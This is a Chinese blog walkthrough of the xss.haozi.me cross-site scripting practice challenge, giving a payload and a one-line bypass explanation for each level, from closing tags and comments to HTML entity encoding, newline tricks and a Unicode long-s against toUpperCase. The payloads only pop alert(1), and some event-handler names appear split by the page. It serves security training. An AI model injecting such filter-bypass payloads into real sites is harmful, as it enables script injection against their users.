首页 > 其他分享 >xss.haozi.me通关攻略

xss.haozi.me通关攻略

时间:2022-11-10 09:46:34浏览次数:37  
标签:me xss haozi alert HTML 绕过

测试浏览器:火狐浏览器

0x00

<script>alert(1)</script>

0x01

</textarea><script>alert(1)</script><textarea>

0x02

"><script>alert(1)</script>

0x03

题目过滤括号,可使用HTML实体编码绕过

<img src='x' one rror="alert&#40;1&#41;">

0x04

题目过滤括号,可使用HTML实体编码绕过

<img src='x' one rror="alert&#40;1&#41;">

0x05

闭合注释

--!><img src="x" one rror="alert(1)">

0x06

绕过正则,使用换行绕过 on.*=

type="image" src="xxx" one rror
="alert(1)"

0x07

img标签不闭合也能触发弹窗

<img src='x' one rror="alert(1)"

0x08

换行去绕过正则

</style
><script>alert(1)</script>

0x09

要求必须以一个固定的链接开头,在链接后闭合script并拼接img标签

https://www.segmentfault.com>"></script><img src='x' one rror=alert(1)>

0x0A

url后面拼接@符号

https://[email protected]/j.js

0x0B

HTML实体编码绕过

<img src="x" one rror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0C

HTML实体编码绕过

<img src="x" one rror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0D

开头添加回车去绕过//注释


alert(1);
-->

0x0E

使用特殊的符号去绕过 toUpperCase()

<ſcript src="https://xss.haozi.me/j.js" ></script>

0x0F

使用//去注释掉后面的内容

');alert(1)//

0x10

</script><script>alert(1)

0x11

");alert(1);//

0x12

\");alert(1);//

标签:me,xss,haozi,alert,HTML,绕过
From: https://www.cnblogs.com/tanyiqu/p/16876034.html

相关文章

  • ELementUI
    1、概述ElementUI是一套基于VUE2.0的桌面端组件库,ElementUI提供了丰富的组件,帮助开发人员快速构建功能强大、风格统一的页面官网地址:http://element-cn.eleme.io/#/zh-C......
  • 【XAML】WindowChrome的使用心得
    参考:https://blog.csdn.net/WPwalter/article/details/81121829 Windows结构标准窗口由两个重叠的矩形组成。外部矩形(灰色)是非工作区,内部矩形(白色)是工作区。 ......
  • uni-app中使用moment
    npminstallmoment--save在main.js中引入并挂载importmomentfrom'moment';Vue.prototype.$moment=moment;使用:YYYY-MM-DD转成时间戳this.$moment(YYYY-MM......
  • Could Not Reliably Determine the Server's Fully Qualified Domain Name
    Aneasytricktosolveproblem:Couldnotreliablydeterminetheserver’sfullyqualifieddomainnameLet’stakeLinuxforexample.#Modifyyourconfiguration......
  • [Element UI 2.x] el-upload组件的部分事件属性传参在.jsx文件中失效的问题
    在之前的开发工作经历中,基本会首选Antd、ant-design-vue、Vant做为前端工程的UI库。今天在处理一个现有项目时,其UI库使用的是ElementUI(2.15.10)。在以JSX形式编写一个具......
  • JvmName 注解在 Kotlin 中的应用
    JvmName注解是Kotlin提供的一个可以变更编译器输出的注解,这里简单的介绍一下其使用规则。应用在文件上未应用@JvmNamepackagecom.example.jvmannotationsampleimportand......
  • Datagrip2019.1.4导出导入数据,mysqldump: Couldn’t execute 'SELECT COLUMN_NAME
    1, 2,需要mysqldump.exe  安装mysql就有 3,安装Mysql8 需要添加禁用参数:--column-statistics=0 否则报错mysqldump:Couldn’texecute'SELECTCOLUMN_NAME......
  • CF1056G Take Metro 题解
    *2900的题,评到黑题是因为std做法要用可持久化平衡树,然而有一种更简洁的做法。注意到\(t\)很大,然后每一步只和\(t\bmodn\)的大小有关系,因此你想先求出\(t=n\)时......
  • POJ 2774 Long Long Message
    DescriptionThelittlecatismajoringinphysicsinthecapitalofByterland.Apieceofsadnewscomestohimthesedays:hismotherisgettin......
  • error Component name “Home“ should always be multi-word vue/multi-word-compone
    新手在操作npmrunserve的时候会出现以下的报错,报错原因是希望组件名写成驼峰式或者链-先形式的,但是官方又明确单个单词组件命名是符合规定的,总结在编译的时候eslint会......